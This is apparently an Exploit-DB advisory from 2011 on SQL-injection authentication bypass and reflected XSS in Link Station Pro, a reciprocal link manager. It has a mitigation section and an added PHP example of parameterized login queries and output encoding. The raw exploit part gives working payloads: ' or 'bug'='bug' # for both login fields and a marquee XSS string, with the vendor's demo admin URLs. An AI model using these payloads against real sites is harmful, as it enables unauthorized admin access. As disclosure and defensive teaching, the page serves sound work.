Vendor: Link Station Pro
By: Raghavendra Karthik D
CVSS: 8.8 (HIGH)
Type: Authentication Bypass and Reflected XSS
CWE: 89, 79
Product Name: Link Station Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Link Station Pro Multiple Vulnerabilities

Link Station Pro is without doubt the most efficient, easiest and most configurable reciprocal link management tool available for all your reciprocal link requirements. Attackers can use the authentication bypass to get into the site's admin panel. The reflected XSS vulnerability can be exploited in the admin panel (in most of the text fields).

Mitigation:

Implement proper authentication and authorization mechanisms, and use input validation and output encoding techniques to prevent XSS attacks.
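
The two fixes named above, applied to the inputs this advisory lists: a bound-parameter login query for the authentication bypass and output encoding for the reflected XSS. This is an added example, not Link Station Pro code; the admins table, its columns, the function names and the sample password are assumptions, and an in-memory SQLite database (via PDO) stands in for the application's real one.

```php
<?php
declare(strict_types=1);
// Added illustration. Table, column and function names are assumptions,
// not taken from Link Station Pro. The sample account is constructed.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$ins = $pdo->prepare('INSERT INTO admins (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Weak pattern: form input concatenated into the SQL text, so quote characters
// in the input become part of the statement (and on MySQL a trailing '#'
// comments out whatever follows). Built for display only, never executed here.
function concatenated_login_sql(string $user, string $pass): string
{
    return "SELECT username FROM admins WHERE username = '$user' AND password = '$pass'";
}

// Hardened: the SQL text is fixed, input is bound as data, and the password
// is verified against a stored hash instead of being compared inside the query.
function login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();          // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// Output encoding for a value echoed back into an HTML attribute or text node.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$sqli = "' or 'bug'='bug' #";                               // login input from the advisory
$xss  = '">><marquee><h1>XSSed_by_r007k17</h1></marquee>';  // text-field input from the advisory

echo concatenated_login_sql($sqli, $sqli), "\n";  // shows the WHERE clause rewritten by input
var_dump(login($pdo, $sqli, $sqli));              // input is looked up as a literal username
var_dump(login($pdo, 'admin', 'constructed-sample-password'));
echo '<input name="category" value="', h($xss), '">', "\n"; // markup arrives as inert text
```
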

Exploit-DB raw data:

# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor:  www.linkstationpro.com
# Date: 28th July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: © 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BRIEF DESCRIPTION
*****************************
 Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php

EXPLOIT:
                 Username: ' or 'bug'='bug' #
                 Password: ' or 'bug'='bug' #
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.

Reflected XSS Vulnerability
********************************
EXPLOIT 2:  XSS Vulnerability in admin panel (in most of the text fields)

   {Demo}:
http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************